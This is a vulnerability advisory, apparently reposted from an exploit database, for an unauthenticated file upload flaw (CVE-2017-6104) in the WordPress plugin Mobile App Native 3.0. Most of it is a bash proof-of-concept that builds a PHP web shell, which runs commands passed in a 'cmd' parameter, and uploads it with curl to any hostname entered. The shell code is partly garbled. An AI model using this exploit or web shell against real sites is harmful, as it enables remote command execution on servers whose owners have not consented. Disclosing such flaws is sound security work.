Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0 Vulnerability Date: 2017-02-27 Download: https://wordpress.org/plugins/zen-mobile-app-native/ Vendor: https://profiles.wordpress.org/zendkmobileapp/ Notified: 2017-02-27 Vendor Contact: Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder. Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code. shell.php << -EOF- "; \$cmd = (\$_REQUEST[‘cmd’]); system(\$cmd); echo ""; } else { echo "Please supply a command cmd"; } ?> -EOF- red='\033[0;31m' NC='\033[0m' # No Color while [ true ]; do echo -e ${red}; echo -e " Mobile App Native 3.0 File Upload PoC Redux $NC"; echo " 3/1/2017"; echo " Larry W. Cashdollar, @_larry0"; echo echo " CVE-2017-6104"; echo "- Advisory -"; echo "http://www.vapid.dhs.org/advisory.php?v=178"; echo echo "Ctrl ^C to exit"; echo -n "Enter Target Hostname :"; read target; echo "[+] Hostname $target"; echo "[+] Exploiting Plugin"; echo RESULT=`curl -# -F 'file=@shell.php' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`; echo "[==========================================================================]" echo $RESULT echo "[==========================================================================]" done # Iranian Exploit DataBase = http://IeDb.Ir [2017-03-04]